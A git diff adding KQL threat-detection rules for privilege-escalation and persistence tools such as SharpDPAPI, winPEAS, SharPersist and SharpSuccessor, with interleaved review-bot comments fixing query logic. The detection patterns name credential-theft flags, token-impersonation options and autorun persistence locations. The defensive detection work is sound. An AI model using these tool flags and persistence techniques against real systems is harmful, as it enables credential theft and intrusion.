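Review bot: `MD5 startswith "9520714AB576B0ED01D1513691377D01"` and `SHA256 startswith "E81CC96E…"` apply a prefix test to complete hashes, which reads as a conversion artefact; a full-length hash should be compared for equality, `MD5 =~ "9520714AB576B0ED01D1513691377D01" or SHA256 =~ "E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A"`, which keeps the case-insensitive comparison the hash columns need. Behaviour is identical today, but `startswith` invites a truncated value to pass review later and documents the wrong intent.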
@@ -0,0 +1,12 @@
+// Title: HackTool - SharpDPAPI Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-26
+// Level: high
+// Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.
+SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\SharpDPAPI.exe" or ProcessVersionInfoOriginalFileName =~ "SharpDPAPI.exe") or ((ProcessCommandLine contains " backupkey " or ProcessCommandLine contains " blob " or ProcessCommandLine contains " certificates " or ProcessCommandLine contains " credentials " or ProcessCommandLine contains " keepass " or ProcessCommandLine contains " masterkeys " or ProcessCommandLine contains " rdg " or ProcessCommandLine contains " vaults ") and ((ProcessCommandLine contains " /file:" or ProcessCommandLine contains " /machine" or ProcessCommandLine contains " /mkfile:" or ProcessCommandLine contains " /password:" or ProcessCommandLine contains " /pvk:" or ProcessCommandLine contains " /server:" or ProcessCommandLine contains " /target:" or ProcessCommandLine contains " /unprotect") or (ProcessCommandLine contains " {" and ProcessCommandLine contains "}:")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql
new file mode 100644
index 00000000..b8e07a5b
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharPersist Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-15
+// Level: high
+// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -t schtask -c " or ProcessCommandLine contains " -t startupfolder -c ") or (ProcessCommandLine contains " -t reg -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t service -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add") or (FolderPath endswith "\\SharPersist.exe" or ProcessVersionInfoProductName =~ "SharPersist")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql
new file mode 100644
index 00000000..f027e1ea
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql
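Review bot: The disjunct `(ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add")` is subsumed by the very first term `ProcessCommandLine contains " -t schtask -c "`, so it can never change the result and should be removed to keep the predicate readable. The `-m add` qualifier only does work for the `reg` and `service` techniques, which the other two branches already express.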
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpImpersonation Execution
+// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-27
+// Level: high
+// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql b/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql
new file mode 100644
index 00000000..76348962
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - winPEAS Execution
+// Author: Georg Lauenstein (sure[secure])
+// Date: 2022-09-19
+// Level: high
+// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1082, attack.t1087, attack.t1046
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "https://github.com/carlospolop/PEASS-ng/releases/latest/download/" or (ProcessCommandLine contains " applicationsinfo" or ProcessCommandLine contains " browserinfo" or ProcessCommandLine contains " eventsinfo" or ProcessCommandLine contains " fileanalysis" or ProcessCommandLine contains " filesinfo" or ProcessCommandLine contains " processinfo" or ProcessCommandLine contains " servicesinfo" or ProcessCommandLine contains " windowscreds") or (InitiatingProcessCommandLine endswith " -linpeas" or ProcessCommandLine endswith " -linpeas") or (ProcessVersionInfoOriginalFileName =~ "winPEAS.exe" or (FolderPath endswith "\\winPEASany_ofs.exe" or FolderPath endswith "\\winPEASany.exe" or FolderPath endswith "\\winPEASx64_ofs.exe" or FolderPath endswith "\\winPEASx64.exe" or FolderPath endswith "\\winPEASx86_ofs.exe" or FolderPath endswith "\\winPEASx86.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql
new file mode 100644
index 00000000..a757525a
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: HKTL - SharpSuccessor Privilege Escalation Tool Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-06
+// Level: high
+// Description: Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments.
+Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpSuccessor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpSuccessor.exe" or ProcessCommandLine contains "SharpSuccessor" or (ProcessCommandLine contains " add " and ProcessCommandLine contains " /impersonate" and ProcessCommandLine contains " /path" and ProcessCommandLine contains " /account" and ProcessCommandLine contains " /name")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql
new file mode 100644
index 00000000..4b4f7048
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Internet Explorer Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Internet Explorer" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer") and (RegistryKey contains "\\Toolbar" or RegistryKey contains "\\Extensions" or RegistryKey contains "\\Explorer Bars") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}" or RegistryKey contains "\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" or RegistryKey contains "\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}" or RegistryKey contains "\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}") or (RegistryKey endswith "\\Toolbar\\ShellBrowser\\ITBar7Layout" or RegistryKey endswith "\\Toolbar\\ShowDiscussionButton" or RegistryKey endswith "\\Toolbar\\Locked"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql b/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql
new file mode 100644
index 00000000..52bc1612
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql
@@ -0,0 +1,12 @@
+// Title: Launch Agent/Daemon Execution Via Launchctl
+// Author: Pratinav Chandra
+// Date: 2024-05-13
+// Level: medium
+// Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1569.001, attack.t1543.001, attack.t1543.004
+// False Positives:
+// - Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "submit" or ProcessCommandLine contains "load" or ProcessCommandLine contains "start") and FolderPath endswith "/launchctl"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql
new file mode 100644
index 00000000..d2986a52
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql
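Review bot: `ProcessCommandLine contains "load"` and `ProcessCommandLine contains "start"` are substring tests, so `launchctl unload …` and `launchctl kickstart …` satisfy them as well, which widens the rule well past the submit/load/start subcommands the description names and will inflate the medium-severity noise on admin workstations. Term matching keeps the stated intent: `(ProcessCommandLine has "submit" or ProcessCommandLine has "load" or ProcessCommandLine has "start") and FolderPath endswith "/launchctl"`.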
@@ -0,0 +1,16 @@
+// Title: Linux Sudo Chroot Execution
+// Author: Swachchhanda Shrawn Poudel (Nextron Systems)
+// Date: 2025-10-02
+// Level: low
+// Description: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution.
+Attackers may use this technique to evade detection and execute commands in a modified environment.
+This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463.
+While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068
+// False Positives:
+// - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --chroot " or ProcessCommandLine contains "sudo -R ") and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql b/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql
new file mode 100644
index 00000000..f5b3a770
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql
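Review bot: `ProcessCommandLine contains " --chroot "` requires a space on both sides, so the `--chroot=/dir` form and a trailing `--chroot /dir` at the end of the line are missed, and `contains "sudo -R "` only matches when `-R` immediately follows `sudo`, so `sudo -u root -R /tmp/x` is missed as well. A regex covers the variants: `| where FolderPath endswith "/sudo" and ProcessCommandLine matches regex @"(^|\s)(--chroot(=|\s)|-R\s)"`. Since the header cites CVE-2025-32463, missing the `=` spelling is a real gap rather than a cosmetic one.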
@@ -0,0 +1,10 @@ +// Title: Microsoft Sync Center Suspicious Network Connections +// Author: elhoim +// Date: 2022-04-28 +// Level: medium +// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql b/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql new file mode 100644 index 00000000..d521f26a --- /dev/null +++ b/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql @@ -0,0 +1,10 @@ +// Title: Narrator's Feedback-Hub Persistence +// Author: Dmitriy Lifanov, oscd.community +// Date: 2019-10-25 +// Level: high +// Description: Detects abusing Windows 10 Narrator's Feedback-Hub +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents +| where (ActionType =~ "DeleteValue" and RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute") or RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql new file mode 100644 index 00000000..ce0452d8 
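Review bot: `ipv4_is_in_range` returns null when either argument is not an IPv4 CIDR, so the three IPv6 entries (`::1/128`, `fe80::/10`, `fc00::/7`) in the where clause are never true, any IPv6 RemoteIP is dropped rather than alerted, and depending on how Kusto folds that null into the `or` chain it may suppress IPv4 results as well, so verify the rule returns rows at all. The simplest fix in this table is the built-in classification: `| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and RemoteIPType !in ("Private", "Loopback")`. If explicit ranges are preferred, use `ipv6_is_in_range` for the IPv6 entries and `ipv4_is_private(RemoteIP)` for the RFC 1918 blocks.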
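Review bot: `ActionType =~ "DeleteValue"` is the Sysmon EventType; DeviceRegistryEvents uses `RegistryValueDeleted`, so the first branch of the where clause never matches. The second branch expects `(Default)` appended to RegistryKey, but this table reports the value name in `RegistryValueName` (empty for the default value, as far as I have seen) rather than in the key path, so I'd expect that branch to be dead too. A form that fits the schema is `| where RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command" and ((ActionType =~ "RegistryValueDeleted" and RegistryValueName =~ "DelegateExecute") or isempty(RegistryValueName))`; confirm how the default value is reported in your tenant before relying on the second half.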
--- /dev/null +++ b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql @@ -0,0 +1,15 @@ +// Title: Network Connection Initiated Via Notepad.EXE +// Author: EagleEye Team +// Date: 2020-05-14 +// Level: high +// Description: Detects a network connection that is initiated by the "notepad.exe" process. +This might be a sign of process injection from a beacon process or something similar. +Notepad rarely initiates a network communication except when printing documents for example. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1055 +// False Positives: +// - Printing documents via notepad might cause communication with the printer via port 9100 or similar. + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100)) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql b/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql new file mode 100644 index 00000000..adca6786 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql @@ -0,0 +1,12 @@ +// Title: New ActiveScriptEventConsumer Created Via Wmic.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2021-06-25 +// Level: high +// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003 +// False Positives: +// - Legitimate software creating script event consumers + +DeviceProcessEvents +| where ProcessCommandLine contains "ActiveScriptEventConsumer" and ProcessCommandLine contains " CREATE " \ No newline at end of file 
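Review bot: The only exclusion in the where clause is `RemotePort == 9100`, but on Windows 11 Notepad ships as a Store package under `C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_*` and, as far as I have observed, makes outbound connections on its own (update and feature checks), so this high-level rule will be noisy on current endpoints. I'd baseline the Store build separately or at least restrict to non-private destinations: `| where InitiatingProcessFolderPath endswith "\\notepad.exe" and RemotePort != 9100 and RemoteIPType == "Public"`. The false-positive note should mention the Store build as well, since port 9100 is no longer the main source of benign hits.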
diff --git a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql new file mode 100644 index 00000000..44b10093 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql @@ -0,0 +1,14 @@ +// Title: New Custom Shim Database Created +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-29 +// Level: medium +// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. +The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 +// False Positives: +// - Legitimate custom SHIM installations will also trigger this rule + +DeviceFileEvents +| where FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql new file mode 100644 index 00000000..307db5e0 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql 
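Review bot: The where clause has no ActionType constraint, so besides the creation the title describes it also fires on FileDeleted and FileRenamed events under `\\Windows\\apppatch\\Custom\\`, which doubles the alerts from a normal install/uninstall cycle. I'd gate it: `| where ActionType in~ ("FileCreated", "FileModified") and (FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\")`. Adding `FolderPath endswith ".sdb"` would further cut noise from temporary files written next to the database, if your data shows any.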
@@ -0,0 +1,10 @@
+// Title: New DNS ServerLevelPluginDll Installed
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-05-08
+// Level: high
+// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql
new file mode 100644
index 00000000..bec45db7
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-05-08
+// Level: high
+// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/config" and ProcessCommandLine contains "/serverlevelplugindll") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
new file mode 100644
index 00000000..f761f8ed
--- /dev/null
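Review bot: `RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll"` compares a value name against the key path; DeviceRegistryEvents puts the value name in `RegistryValueName`, so this never matches and a high-level rule is silent. The working form is `| where ActionType =~ "RegistryValueSet" and RegistryKey endswith "\\services\\DNS\\Parameters" and RegistryValueName =~ "ServerLevelPluginDll" and isnotempty(RegistryValueData)`. The same key-versus-value mapping appears in several other registry rules in this patch, so it is worth fixing in the converter rather than rule by rule.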
+++ b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql @@ -0,0 +1,11 @@ +// Title: New Netsh Helper DLL Registered From A Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-28 +// Level: high +// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 + +DeviceRegistryEvents +| where RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql b/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql new file mode 100644 index 00000000..022ba935 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql 
@@ -0,0 +1,12 @@ +// Title: New Outlook Macro Created +// Author: @ScoubiMtl +// Date: 2021-04-05 +// Level: medium +// Description: Detects the creation of a macro file for Outlook. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 +// False Positives: +// - User genuinely creates a VB Macro for their email + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\outlook.exe" and FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql b/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql new file mode 100644 index 00000000..0dabaaa0 --- /dev/null +++ b/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql 
@@ -0,0 +1,12 @@ +// Title: New RUN Key Pointing to Suspicious Folder +// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2018-08-25 +// Level: high +// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Software using weird folders for updates + +DeviceRegistryEvents +| where (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and ((RegistryValueData contains ":\\Perflogs" or RegistryValueData contains ":\\ProgramData'" or RegistryValueData contains ":\\Windows\\Temp" or RegistryValueData contains ":\\Temp" or RegistryValueData contains "\\AppData\\Local\\Temp" or RegistryValueData contains "\\AppData\\Roaming" or RegistryValueData contains ":\\$Recycle.bin" or RegistryValueData contains ":\\Users\\Default" or RegistryValueData contains ":\\Users\\public" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "%Public%" or RegistryValueData contains "%AppData%") or (RegistryValueData contains ":\\Users\\" and (RegistryValueData contains "\\Favorites" or RegistryValueData contains "\\Favourites" or RegistryValueData contains "\\Contacts" or RegistryValueData contains "\\Music" or RegistryValueData contains "\\Pictures" or RegistryValueData contains "\\Documents" or RegistryValueData contains "\\Photos"))) and (not(((RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Windows\\Temp\\") and (RegistryValueData contains "rundll32.exe " and RegistryValueData contains 
"C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32") and InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\Download\\" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce*"))) and (not((RegistryValueData endswith "Spotify.exe --autostart --minimized" and (InitiatingProcessFolderPath endswith "C:\\Program Files\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe") and RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql new file mode 100644 index 00000000..d15f18ab --- /dev/null +++ b/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql 
@@ -0,0 +1,13 @@ +// Title: Office Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where ((RegistryKey contains "\\Word\\Addins" or RegistryKey contains "\\PowerPoint\\Addins" or RegistryKey contains "\\Outlook\\Addins" or RegistryKey contains "\\Onenote\\Addins" or RegistryKey contains "\\Excel\\Addins" or RegistryKey contains "\\Access\\Addins" or RegistryKey contains "test\\Special\\Perf") and (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Office" or RegistryKey contains "\\Software\\Microsoft\\Office")) and (not((RegistryValueData =~ "(Empty)" or ((InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\regsvr32.exe") and (RegistryKey endswith "\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1*" or RegistryKey endswith "\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim.InquireConnector.1*" or RegistryKey endswith "\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1*" or RegistryKey endswith "\\Outlook\\AddIns\\AccessAddin.DC*" or RegistryKey endswith 
"\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteOLRD.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1*" or RegistryKey endswith "\\Outlook\\Addins\\OcOffice.OcForms*" or RegistryKey contains "\\Outlook\\Addins\\OneNote.OutlookAddin" or RegistryKey endswith "\\Outlook\\Addins\\OscAddin.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\OutlookChangeNotifier.Connect*" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.LyncAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.UCAddin.1" or RegistryKey endswith "\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin*" or RegistryKey contains "AddinTakeNotesService\\FriendlyName")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe")) and RegistryKey 